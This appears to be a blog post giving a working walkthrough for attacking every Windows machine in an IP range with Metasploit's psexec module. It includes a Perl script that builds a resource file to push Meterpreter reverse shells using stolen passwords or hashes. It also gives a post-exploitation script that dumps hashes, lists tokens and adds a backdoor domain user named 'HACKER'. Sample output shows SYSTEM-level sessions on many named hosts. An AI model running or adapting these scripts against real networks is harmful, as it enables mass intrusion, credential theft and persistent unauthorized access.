The first script automates Metasploit's psexec module. Once I've obtained a credential or a hash, this script attempts to upload a Meterpreter shell on to every Windows machine in an IP range. The second script allows you to run a resource file against all previously established sessions.
This post assumes you have a working knowledge of Metasploit and you're running it off of BackTrack. You'll need to prep your environment and setup your Metasploit with the required multi_meter_resource.rb file which you can download from here:
https://github.com/darkoperator/Meterpreter-Scripts/blob/89d04cae10b8a351e8c2ba1b60a38f53fe3ef3ed/post/multi/manage/multi_post_resource.rb
Save to /pentest/exploits/framework3/modules/post/multi/manage/multi_post_resource.rb
You will need to create your own post exploitation resource file. I use something like the following:
--------
all sysinfo
all run hashdump
all route
all use incognito
all list_tokens -u
all add_user HACKER Asdf1234! -h DOMAIN-CONTROLLER-IP
--------
Save as /pentest/exploits/framework3/scripts/resource/go.rcAfter you've compromised a target with your favorite exploit and pulled a hashdump or obtained a credential through ARP poisoning or some other method, you're ready to automate the psexec attack. The Metasploit psexec module uses a valid administrator username and password or password hash to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals.
First create a perl file that can be compiled into an MSF resource file.
--------
#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser USERNAME\n";
print "set SMBPass PASSWORD OR HASH\n";
#As Necessary "set SMBDomain DOMAIN-NAME\n";
#As Necessary "set SMBDomain DOMAIN-NAME\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST xxx.xxx.xxx.xxx\n";
print "set LPORT 4567\n";
# first range
foreach(1.. 254) {
print "set RHOST xxx.xxx.xxx.$_\n";
print "exploit -z\n";
print "sleep 1\n";
}
--------
Save as /root/psexec.pl
In a command prompt execute:
perl psexec.pl > psexec.rc
Then launch your attack:
msfconsole -r psexec.rc
p0wn for fun and profit (Example):
resource (psexec.rc)> set RHOST xxx.xxx.xxx.194
RHOST => xxx.xxx.xxx.194
resource (psexec.rc)> exploit -z
[*] Started reverse handler on xxx.xxx.xxx.188:4412
[*] Connecting to the server...
[*] Authenticating to xxx.xxx.xxx.194:445|WORKGROUP as user 'USERNAME'...
[*] Uploading payload...
[*] Created \oFMiBmQi.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xxx.xxx.xxx.194[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xxx.xxx.xxx.194[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (hABdqAhk -"MhdWnoVdJaQBUUPAlKFZdgpIloQlkB")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \oFMiBmQi.exe...
[*] Sending stage (752128 bytes) to xxx.xxx.xxx.194
[*] Meterpreter session 14 opened (xxx.xxx.xxx.188:4412 -> xxx.xxx.xxx.194:1191) at Wed Aug 24 15:11:16 -0700 2017
[*] Session 14 created in the background.
Allow the script to finish executing against your target ranges and then review the results:
msf exploit(psexec) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ HDMORE-DT3 xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.14:54347
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DHOLZER-DT xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.104:54033
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ RBOWS-LT2 xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.105:51174
5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ JGROSMAN-DT xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.107:58424
6 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ JMCRAY-DT xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.116:60363
8 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ BKREB2-DT xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.123:55074
9 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ARAHMAN-DT2 xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.127:59479
10 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ JSTEELE-LT2 xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.147:59553
Then load DarkOperator's multi_post_resource.rb module:
msf exploit(psexec) > use post/multi/manage/multi_post_resource.rb
Then load your resource file:
msf auxiliary(multi-rc) > set resource /pentest/exploits/framework3/scripts/resource/go.rc
Start the fun!
msf auxiliary(multi-rc) > run
(Example Output)
[+] Running command sysinfo against sessions 1
System Language : en_US
OS : Windows 7 (Build 7600).
Computer : JSTEELE-LT2
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32
[+] Running command sysinfo against sessions 2
System Language : en_US
OS : Windows 7 (Build 7600).
Computer : JMCRAY-LT3
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32
[+] Running command sysinfo against sessions 3
System Language : en_US
OS : Windows 7 (Build 7601, Service Pack 1).
Computer : HDMORE-LT
Architecture : x86
Meterpreter : x86/win32
This will loop through your entire list of sessions, dump sysinfo, hashes, routes, etc and attempt to add a user to the domain.
For further information:
http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash
http://www.darkoperator.com/blog/2011/7/13/automating-post-modules-and-meterpreter-across-sessions.html
Thanks for the info and welcome to the blog-o-sphere!
ReplyDelete